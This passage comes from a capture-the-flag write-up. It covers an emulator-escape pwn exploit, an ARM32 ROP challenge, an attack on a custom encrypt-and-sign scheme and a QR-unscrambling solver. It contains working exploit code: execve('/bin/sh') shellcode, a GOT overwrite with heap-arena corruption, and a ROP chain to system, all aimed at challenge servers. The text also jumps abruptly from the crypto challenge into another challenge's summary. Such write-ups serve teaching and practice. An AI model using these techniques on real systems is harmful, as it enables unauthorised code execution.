for i in range(0, len(cat_flag_sc), 8):
    raw_sc_8 = hex(u64(cat_flag_sc[i:i+8].ljust(8, b'\x00')))
    shellcode_payload += f'''
mov r12, {raw_sc_8}
mov QWORD PTR [r9], r12
add r9, 8'''

sc = f'''
%use masm
_start:
nop
mov rax, 0x4141414141414141 ; just for debugging purpose, to easily find the emulated registers value
stage_1: ; find libc base address
mov r13, 0x03010102464c457f; set r13 to libc first 8 bytes
mov r12, QWORD PTR [rsp]; set r12 to rsp content
cmp r12, r13 ; compare it
je stage_2 ; if it is equals, jump to stage_2
add rsp, 8 ; else, increase the rsp by 8
jmp stage_1
stage_2: ; find pie base address
mov r9, rsp ; copy libc base to r9
sub r9, 0x001d10 ; now r9 contains pie_base
mov r9, QWORD PTR [r9] ; set r9 to r9 content, which is pie_base
stage_3: ; smuggle shellcode
add r9, 0x33150 ; set it to rwx+0x150
mov rbx, r9 ; store it in rbx, because we will need this address later
{shellcode_payload}
jmp stage_4
stage_4: ; for now, set stage_4 to infinite loop first
jmp stage_4
'''

# Create and compile the assembly
f = open('simple.s', 'wb')
f.write(sc.encode())
f.close()
os.system('nasm -f elf64 simple.s -o simple.o && ld -o simple simple.o && chmod 755 simple')

# Connect to docker
f = open('simple', 'rb')
payload = f.read()
if args.REMOTE:
    r = remote('137.184.6.25', 17003)
else:
    r = remote('localhost', 17003)
r.sendlineafter(b'len: ', str(len(payload)).encode())
r.send(payload)
r.interactive()
Basically, the stage_3 assembly splits our execve shellcode into 8-byte pieces, then writes them to the rwx region one by one.
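The splitting step can be reproduced without pwntools. The sketch below uses two hypothetical helpers: to_qwords pads the last piece with zero bytes like the ljust call in the script, and pack_string shows how the string immediates in the shellcode (for example 0x68732f6e69622f for /bin/sh) are just little-endian encodings.

```python
def to_qwords(code: bytes) -> list:
    """Split code into little-endian 8-byte integers, zero-padding the tail."""
    out = []
    for i in range(0, len(code), 8):
        piece = code[i:i + 8].ljust(8, b"\x00")
        out.append(int.from_bytes(piece, "little"))
    return out


def pack_string(s: bytes) -> int:
    """Little-endian integer whose in-memory bytes spell out s."""
    return int.from_bytes(s, "little")


print([hex(q) for q in to_qwords(b"\x90" * 10)])
# ['0x9090909090909090', '0x9090']
print(hex(pack_string(b"/bin/sh")))  # 0x68732f6e69622f
print(hex(pack_string(b"cat /f*")))  # 0x2a662f20746163
```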
Now, we will move to the final step, which is stage_4. To recap what we have done so far:
Get libc base address.
Get PIE base address and the rwx region address.
Put shellcode in rwx region.
Stage 4: RIP Control
The final step is obvious: make blink jump to our shellcode. My strategy is to overwrite the strlen GOT entry in libc with our shellcode address. In order to reach strlen, I need to trigger the __libc_message function, which uses strlen along the way. To trigger it, we need to cause a malloc or free error.
After playing around in gdb for a while, I found a way to do it. With the OOB access that I have, I overwrite libc’s main_arena+0x10 with garbage. Then, when blink emulates a mov instruction after that, it seems that blink needs to do some allocation, and because main_arena+0x10 is corrupted, an error is triggered, the strlen GOT entry (which now holds the address of our shellcode) is called, and our shellcode is executed.
So, to summarize, the final step (stage_4) is:
Overwrite the strlen GOT entry in libc with our execve shellcode address.
The strlen GOT entry is located at libc_base+0x219098.
Overwrite the libc main_arena+0x10 value with garbage.
main_arena starts at libc_base+0x219c80.
Execute any mov instruction to trigger the allocation error.
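The addresses involved in stage_4 are plain offsets from the two leaked bases. Here is a small sketch that collects them in one place. The offsets are the ones quoted in this writeup for the challenge’s libc and blink build; the function name and the example base addresses are made up.

```python
STRLEN_GOT_OFF = 0x219098   # libc strlen GOT entry
MAIN_ARENA_OFF = 0x219C80   # start of main_arena in libc
RWX_OFF = 0x33000           # rwx region relative to the blink PIE base
SHELLCODE_OFF = 0x150       # where the shellcode is placed inside rwx


def stage4_targets(libc_base: int, pie_base: int) -> dict:
    """Absolute addresses written or used by stage_3 and stage_4."""
    return {
        "strlen_got": libc_base + STRLEN_GOT_OFF,
        "arena_plus_0x10": libc_base + MAIN_ARENA_OFF + 0x10,
        "shellcode": pie_base + RWX_OFF + SHELLCODE_OFF,
    }


# Hypothetical bases, only to show the arithmetic.
targets = stage4_targets(0x7FD683400000, 0x555555554000)
for name, addr in targets.items():
    print(name, hex(addr))
```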
Now, let’s modify our script to do the stage_4, which is my final script that I used to solve the challenge.
from pwn import p64, u64, p32, u32
from pwn import *
import os

context.arch = 'amd64'

# execve("/bin/sh", ["/bin/sh", "-c", "cat /f*"])
cat_flag_sc = asm('''
mov rsi, 0x68732f6e69622f
push rsi
mov rdi, rsp
mov rsi, 0x2a662f20746163
push rsi
mov r10, rsp
mov rsi, 0x632d
push rsi
mov r11, rsp
push 0x0
push r10
push r11
push rdi
mov rsi, rsp
xor rdx, rdx
mov rax, 0x3b
syscall
''')

shellcode_payload = ''
for i in range(0, len(cat_flag_sc), 8):
    raw_sc_8 = hex(u64(cat_flag_sc[i:i+8].ljust(8, b'\x00')))
    shellcode_payload += f'''
mov r12, {raw_sc_8}
mov QWORD PTR [r9], r12
add r9, 8'''

sc = f'''
%use masm
_start:
nop
mov rax, 0x4141414141414141 ; just for debugging purpose, to easily find the emulated registers value
stage_1: ; find libc base address
mov r13, 0x03010102464c457f; set r13 to libc first 8 bytes
mov r12, QWORD PTR [rsp]; set r12 to rsp content
cmp r12, r13 ; compare it
je stage_2 ; if it is equals, jump to stage_2
add rsp, 8 ; else, increase the rsp by 8
jmp stage_1
stage_2: ; find pie base address
mov r9, rsp ; copy libc base to r9
sub r9, 0x001d10 ; now r9 contains pie_base
mov r9, QWORD PTR [r9] ; set r9 to r9 content, which is pie_base
stage_3: ; smuggle shellcode
add r9, 0x33150 ; set it to rwx+0x150
mov rbx, r9 ; store it in rbx, because we will need this address later
{shellcode_payload}
jmp stage_4
stage_4: ; overwrite strlen got + trigger malloc/free error
mov r10, rsp ; copy libc base to r10
add r10, 0x219098 ; point it to strlen GOT entry
mov QWORD PTR [r10], rbx ; change its value to our shellcode address
mov rdi, rsp ; copy libc base to rdi
; change main_arena+0x10 value to garbage (0x4141414141414141)
add rdi, 0x219c80
add rdi, 0x10
mov QWORD PTR [rdi], rax
; mov instruction will somehow trigger malloc, and due to
; we corrupt the main_arena+0x10 with garbage, it will
; trigger malloc error
mov QWORD PTR [rdi], rax
'''

# Create and compile the assembly
f = open('simple.s', 'wb')
f.write(sc.encode())
f.close()
os.system('nasm -f elf64 simple.s -o simple.o && ld -o simple simple.o && chmod 755 simple')

# Connect to docker
f = open('simple', 'rb')
payload = f.read()
if args.REMOTE:
    r = remote('137.184.6.25', 17003)
else:
    r = remote('localhost', 17003)
r.sendlineafter(b'len: ', str(len(payload)).encode())
r.send(payload)
r.interactive()
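The part of the script that smuggles the shellcode can be hard to follow, so here is a minimal standalone sketch of the same idea using only the standard library. The helper name `to_mov_stores` and the placeholder bytes are my own, not part of the solver: the blob is cut into 8-byte little-endian words, and each word becomes a `mov` of an immediate followed by a store and a pointer bump.

```python
import struct


def to_mov_stores(blob, dst_reg="r9", tmp_reg="r12"):
    """Turn raw bytes into assembly lines that write them 8 bytes at a time."""
    lines = []
    for i in range(0, len(blob), 8):
        # Pad the last chunk with zero bytes so it is always a full qword.
        chunk = blob[i:i + 8].ljust(8, b"\x00")
        (value,) = struct.unpack("<Q", chunk)
        lines.append(f"mov {tmp_reg}, {hex(value)}")
        lines.append(f"mov QWORD PTR [{dst_reg}], {tmp_reg}")
        lines.append(f"add {dst_reg}, 8")
    return lines


# Placeholder bytes (three nops and a syscall), not the real shellcode.
demo = b"\x90" * 3 + b"\x0f\x05"
for line in to_mov_stores(demo):
    print(line)
```

The little-endian unpacking matters: the first byte of each chunk ends up in the lowest byte of the immediate, so the store reproduces the original byte order in memory.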
Flag: CJ2023{80cf59c8fe2fc802b5fc532cb2a3843f}
sorearm
Description
cant pwn with my sorearm
137.184.6.25 17002
Initial Analysis
In this challenge, we were given a binary called labyrinth, which is an ARM32 binary. Let’s disassemble the binary and take a closer look.
This is ARM assembly. Looking through this small function, we can spot a buffer overflow: the stack frame of main is 0x20 bytes, but we can read 0x100 bytes into SP+0x8. It is clear that we need to use this overflow to perform ROP and spawn a shell, so let’s look for gadgets that we can use.
Looking through the other available functions, we can see that there are two interesting functions called a and b.
Based on these two functions, we can see that the binary already provides the gadgets that we need:
The binary already has a sequence of instructions that can call system (which is in b).
The binary already has a /bin/sh string that we can use as the parameter for the above gadget.
Using this information that we have gathered, we can start to craft our solution.
Solution
First, let’s start by calculating the offset that we need to use to control the instruction pointer. Observe that in the main function:
We can read buffer starting from sp+8
There is an extra POP {R7, PC} before the main function returns. Remember that this is a 32-bit binary, so the POP will only consume 4 bytes.
The stack size is 0x20. Based on those two observations, we need (0x20-0x8) bytes to fill the rest of the frame plus 0x4 bytes for the saved R7, so the padding is (0x20-0x8)+0x4 = 0x1c bytes long. The next 4 bytes that we send after the padding are popped into PC.
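The offset calculation can be written down as a few lines of Python. This is only a sketch of the arithmetic described above; the constant names are mine.

```python
STACK_FRAME = 0x20  # stack space reserved by main
BUF_OFFSET = 0x08   # the read starts writing at sp+8
SAVED_R7 = 0x04     # 4-byte slot consumed by R7 in POP {R7, PC}

# Bytes needed before we reach the slot that is popped into PC.
padding_len = (STACK_FRAME - BUF_OFFSET) + SAVED_R7
padding = b"A" * padding_len
print(hex(padding_len))
```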
To spawn a shell, we need to call system("/bin/sh"). In ARM32, the first parameter of the function needs to be put in the R0 register. Observe that in the b function, we already have this gadget:
MOV R0, R3 ; command
BLX system
And using the help of ROPGadget, we can see that there is a good gadget that can set the R3 value.
We can use this gadget to fill the r3 with the /bin/sh address, then use the system gadget to spawn the shell. Below is the solver that I used to solve the challenge.
Notice that I incremented the system gadget address by 1. This is most likely the Thumb bit: on ARM32, when an address is loaded into PC by POP or BX, bit 0 selects the instruction set, and an odd address keeps execution in Thumb mode.
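To make the payload layout concrete, here is a rough sketch of how such a chain could be assembled. Everything address-related is a placeholder: the three constants are made up, and the shape of the R3 gadget (`pop {r3, pc}`) is an assumption, since the actual gadget is not reproduced in this text. Only the 0x1c padding and the +1 on the system gadget come from the writeup.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word, as ARM32 expects on the stack."""
    return struct.pack("<I", value)


# Placeholder addresses, NOT taken from the real binary.
POP_R3_PC = 0x00010000      # assumed gadget shape: pop {r3, pc}
BINSH = 0x00020000          # address of the "/bin/sh" string
SYSTEM_GADGET = 0x00010100  # mov r0, r3 ; blx system


def build_chain(pop_r3_pc, binsh, system_gadget):
    payload = b"A" * 0x1C        # padding up to the saved PC
    payload += p32(pop_r3_pc)    # first return address
    payload += p32(binsh)        # popped into r3
    payload += p32(system_gadget)  # popped into pc
    return payload


# The writeup adds 1 to the system gadget address.
chain = build_chain(POP_R3_PC, BINSH, SYSTEM_GADGET + 1)
print(chain.hex())
```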
Flag: CJ2023{6fb2ad4fe1019c980a3d67b6754733ec}
Crypto
daruma
Description
Software audit is so cringe bro, why don’t we do paper audit instead
nc 178.128.102.145 50001
Initial Analysis
In this challenge, we were given a file called challenge.py which is the source code of the server.
import random
from Crypto.Util.number import *


class AECF:
    def __init__(self, p=None, q=None, g=2):
        p = p or getPrime(512)
        q = q or getPrime(512)
        n = p * q
        self.g = g
        self.n2 = n**2
        self.totient = n * (p - 1) * (q - 1)
        while True:
            self.k = random.randrange(2, self.n2 - 1)
            if GCD(self.k, self.n2) == 1:
                break
        while True:
            self.e = random.randrange(2, self.totient - 1)
            if GCD(self.e, self.totient) == 1:
                break
        self.d = inverse(self.e, self.totient)
        self.l = random.randrange(1, self.n2 - 1)
        self.beta = pow(self.g, self.l, self.n2)

    def public_key(self):
        return (self.n2, self.e, self.beta)

    def private_key(self):
        return (self.d, self.l)

    def encrypt_and_sign(self, plaintext, public):
        n2, e, beta = public
        m = bytes_to_long(plaintext)
        r = pow(self.k, e, n2) % n2
        s = m * self.k * pow(beta, self.l, n2) % n2
        return r, s

    def decrypt_and_verify(self, r, s, beta):
        m = s * inverse(pow(r, self.d, self.n2), self.n2) * \
            inverse(pow(beta, self.l, self.n2), self.n2) % self.n2
        return long_to_bytes(m)


FLAG = open('flag.txt', 'rb').read()
bob = AECF()
enc_flag = bob.encrypt_and_sign(FLAG, bob.public_key())
assert bob.decrypt_and_verify(*enc_flag, bob.beta) == FLAG
print("Encrypted flag:", enc_flag)
print("Bob public key:", bob.public_key())

for _ in range(2):
    print()
    print("=" * 40)
    try:
        n = int(input("Your public modulus: "))
        if n.bit_length() < 2000 or n.bit_length() > 10000 or isPrime(n):
            print("Insecure modulus")
            break
        e = int(input("Your public e: "))
        beta = int(input("Your public beta: "))
        message = input("Message you want to encrypt and sign: ")
        c = bob.encrypt_and_sign(message.encode(), (n, e, beta))
        print("Your ciphertext:", c)
    except Exception as e:
        print(e)
        break
The challenge implements the encryption scheme proposed in the attached paper, and our job is to show that the scheme is vulnerable. Let’s try to understand the implemented code first.
First, the code initializes the encryption class, which generates some parameters. The public key is the tuple $(n^2, e, \beta)$.
Second, the code encrypts and signs the flag with Bob’s public key, where the values of $r$ and $s$ are calculated as follows:
$$
r = k^e \bmod n^2 \\
s = (m \cdot k \cdot (\beta^l \bmod n^2)) \bmod n^2
$$
where:
$m$ is the message.
$n^2$ is the squared modulus ($p^2q^2$).
$k$ and $l$ are Bob’s secret random integers, both smaller than $n^2$.
Then, the code gives us the values ($r$, $s$, $n^2$, $e$, $\beta$).
After that, the code gives us two calls to encrypt_and_sign, where we can send our own:
public key
message
Based on this information, we need to somehow decrypt the encrypted flag that the code gave us.
Solution
Let’s take a closer look at the equation for $s$, where $n$ now denotes whichever public modulus is passed to encrypt_and_sign:
$$
s = (m \cdot k \cdot (\beta^l \bmod n)) \bmod n
$$
In order to recover $m$, the missing values are $k$ and $l$. So the goal is to use the two tries that the server gives us to recover both of them.
Recovering $k$ is easy. Observe that if we send a huge public modulus (larger than $k$) and use $e=1$, the $r$ value returned by the server is $k^1 \bmod n$, which is exactly $k$.
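A toy version of this step, using small made-up numbers instead of the real 2000+ bit values, looks like the sketch below. The function mirrors the formulas of the server's encrypt_and_sign, but takes Bob's secrets as explicit arguments so that it can run standalone; all concrete values are stand-ins.

```python
def encrypt_and_sign(m, k, l, public):
    """Same formulas as the challenge, with Bob's secrets passed explicitly."""
    n, e, beta = public
    r = pow(k, e, n)
    s = m * k * pow(beta, l, n) % n
    return r, s


# Stand-ins for Bob's secrets (tiny compared to the real ones).
secret_k = 0x1234567
secret_l = 4242

# Attacker-chosen public key: a composite modulus larger than k, and e = 1.
attacker_n = 3 * 2**40
r, s = encrypt_and_sign(65, secret_k, secret_l, (attacker_n, 1, 5))

# With e = 1 and n > k, r is k itself.
recovered_k = r
print(hex(recovered_k))
```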
Now that we know $k$, we can use the $s$ that the server returns for our own message to recover the value of $(\beta^l \bmod n)$, because:
$$
(\beta^l \bmod n) = s \cdot k^{-1} \cdot m^{-1} \bmod n
$$
Recovering $l$ from this value is a classic discrete logarithm problem. Remember that we can select our own $n$ and $\beta$, so we can simply pick a weak $n$, for example one whose multiplicative group has a smooth order, so that the discrete logarithm can be computed in a short time.
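Here is a small sketch of this step with toy parameters. The weak modulus used here (a power of 3, with $\beta = 2$ as generator) is my own illustrative choice and not necessarily what the original solver used, and baby-step giant-step stands in for a proper discrete-log routine. It only works because the toy group is tiny; at the real size one would rely on something like Pohlig-Hellman over a smooth group order.

```python
from math import isqrt


def bsgs(g, h, n, order):
    """Return x in [0, order) with g**x == h (mod n), or None if not found."""
    m = isqrt(order) + 1
    table = {}
    cur = 1
    for j in range(m):           # baby steps: g^j
        table.setdefault(cur, j)
        cur = cur * g % n
    factor = pow(g, -m, n)       # g^(-m), needs Python 3.8+
    gamma = h % n
    for i in range(m + 1):       # giant steps: h * g^(-i*m)
        if gamma in table:
            return i * m + table[gamma]
        gamma = gamma * factor % n
    return None


# Toy "weak" modulus chosen by the attacker; 2 generates the group mod 3^10.
n = 3**10
order = 2 * 3**9
beta = 2

# Stand-ins for Bob's secrets; k and m must be invertible mod n here.
secret_l = 31337
k = 1000003
m = 65

s = m * k * pow(beta, secret_l, n) % n        # what the server would return
h = s * pow(k, -1, n) * pow(m, -1, n) % n     # equals beta^l mod n
recovered_l = bsgs(beta, h, n, order)
print(recovered_l)
```

Note that the group order has to exceed $l$ for the recovered exponent to be the real $l$ rather than just its residue modulo the order.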
After we recover $k$ and $l$, we can recover the flag from the $s$ of the encrypted flag, this time using Bob’s own modulus $n^2$ and $\beta$:
$$
m = s \cdot k^{-1} \cdot (\beta^l \bmod n^2)^{-1} \bmod n^2
$$
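The final recovery can be checked end to end on toy numbers. This is a sketch with small made-up primes and secrets, and it assumes $k$ and $l$ have already been recovered as described above.

```python
# Toy stand-ins for Bob's key material (the real primes are 512 bits).
p, q = 1009, 1013
n2 = (p * q) ** 2
k = 65537                 # coprime to n2
l = 123457
beta = pow(2, l, n2)      # Bob's public beta = g^l mod n^2 with g = 2

# Bob encrypts the flag under his own public key.
flag = b"flag"
m = int.from_bytes(flag, "big")
s = m * k * pow(beta, l, n2) % n2

# Attacker side: undo the two multiplications once k and l are known.
mask = pow(beta, l, n2)
recovered_m = s * pow(k, -1, n2) * pow(mask, -1, n2) % n2
recovered = recovered_m.to_bytes((recovered_m.bit_length() + 7) // 8, "big")
print(recovered)
```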
Below is the solver that I used to solve the challenge (sage file):
To summarize, the code starts by creating a QR code that decodes to the FLAG. Then, the code converts the QR code into a matrix of booleans.
The code generates two random numbers $a$ and $b$, then mixes the matrix 22 times using those values. The mix function scrambles the array by applying the following linear equations to each index pair:
$$
nx = (x + y \cdot a) \bmod \text{len(arr)} \\
ny = (x \cdot b + y \cdot (a \cdot b + 1)) \bmod \text{len(arr)}
$$
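As a sketch of what one mixing pass does, the equations above can be written as the function below. The challenge's own mix function is not reproduced in this text, so the name `mix_once` and the convention that the cell at $(x, y)$ moves to $(nx, ny)$ are assumptions, chosen to match how the solver later inverts the mapping.

```python
def mix_once(arr, a, b):
    """Apply one pass of the index scramble to a square 2D list."""
    n = len(arr)
    out = [[0] * n for _ in range(n)]
    for x in range(n):
        for y in range(n):
            nx = (x + y * a) % n
            ny = (x * b + y * (a * b + 1)) % n
            out[nx][ny] = arr[x][y]
    return out


# Tiny 3x3 grid with distinct values so the permutation is visible.
grid = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
mixed = mix_once(grid, 1, 1)
for row in mixed:
    print(row)
```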
After that, it rescales the image.
Based on this scheme, the goal is to undo the mixing of mixed.png and get the correct QR code image.
Solution
We can see that the values of $a$ and $b$ are very small, which means that they can be brute-forced. Observe that once we guess $a$ and $b$, the mix function becomes two linear equations with two unknowns ($x$, $y$) modulo $\text{len(arr)}$. The coefficient matrix has determinant $(ab + 1) - ab = 1$, so the system always has a unique solution. We can simply:
unscale the mixed.png
for each mix iteration, try to recover the original value of $x$ and $y$ by solving the linear equations.
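Because the determinant of the coefficient matrix is 1, the inverse can also be written in closed form without a linear solver: $x = ((ab+1) \cdot nx - a \cdot ny) \bmod N$ and $y = (ny - b \cdot nx) \bmod N$. The sketch below checks this on a toy grid. Both function names are mine, and the forward `mix_once` follows the same assumed convention as the equations above.

```python
def mix_once(arr, a, b):
    """Forward scramble: the cell at (x, y) moves to (nx, ny)."""
    n = len(arr)
    out = [[0] * n for _ in range(n)]
    for x in range(n):
        for y in range(n):
            nx = (x + y * a) % n
            ny = (x * b + y * (a * b + 1)) % n
            out[nx][ny] = arr[x][y]
    return out


def unmix_once(arr, a, b):
    """Inverse scramble using the closed-form inverse of [[1, a], [b, ab+1]]."""
    n = len(arr)
    out = [[0] * n for _ in range(n)]
    for nx in range(n):
        for ny in range(n):
            x = ((a * b + 1) * nx - a * ny) % n
            y = (ny - b * nx) % n
            out[x][y] = arr[nx][ny]
    return out


# Round trip on a 5x5 grid with 22 passes, as in the challenge.
original = [[r * 5 + c for c in range(5)] for r in range(5)]
state = original
for _ in range(22):
    state = mix_once(state, 2, 3)
for _ in range(22):
    state = unmix_once(state, 2, 3)
print(state == original)
```

This avoids building a matrix for every pixel, which should make the brute force over $(a, b)$ noticeably faster than calling a generic solver.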
Below is the script that I used to solve the challenge (sage). This script will basically generate a lot of images based on the pair of $a$ and $b$ that we brute-forced. We just need to find one image which is the QRCode of the FLAG.
import numpy as np
from PIL import Image


def unscale(final_arr):
    mod = len(final_arr) // 10
    arr = np.zeros(shape=(mod, mod), dtype=bool)
    for i in range(mod):
        for j in range(mod):
            arr[i][j] = final_arr[i*10, j*10]
    return arr.astype(int).tolist()


def unmix(a, b, arr):
    mod = len(arr)
    R = IntegerModRing(mod)
    real_mat = [[0 for _ in range(mod)] for _ in range(mod)]
    for i in range(mod):
        for j in range(mod):
            M = Matrix(R, [
                [1, a],
                [b, (a*b + 1)],
            ])
            target = vector(R, [i, j])
            x, y = M.solve_right(target)
            real_mat[x][y] = arr[i][j]
    return real_mat


def rescale(arr):
    mod = len(arr)
    final_arr = np.zeros(shape=(mod*10, mod*10), dtype=bool)
    for i in range(mod):
        for j in range(mod):
            final_arr[i*10:(i+1)*10, j*10:(j+1)*10] = arr[i][j]
    return final_arr


image = Image.open("mixed.png")
image_array = np.array(image)
for a in range(1, (len(image_array)//10) - 1):
    for b in range(1, (len(image_array)//10) - 1):
        scrambled = unscale(image_array)
        for _ in range(22):
            scrambled = unmix(a, b, scrambled)
        ori_arr = np.array(scrambled, dtype=bool)
        ori_arr = rescale(ori_arr)
        img = Image.fromarray(ori_arr)
        img.save(f'result/{a}-{b}-flag.png')
        print(f'Saved to: result/{a}-{b}-flag.png')
After running the script for a while, parameters $a=10$ and $b=18$ produce the correct QRCode image.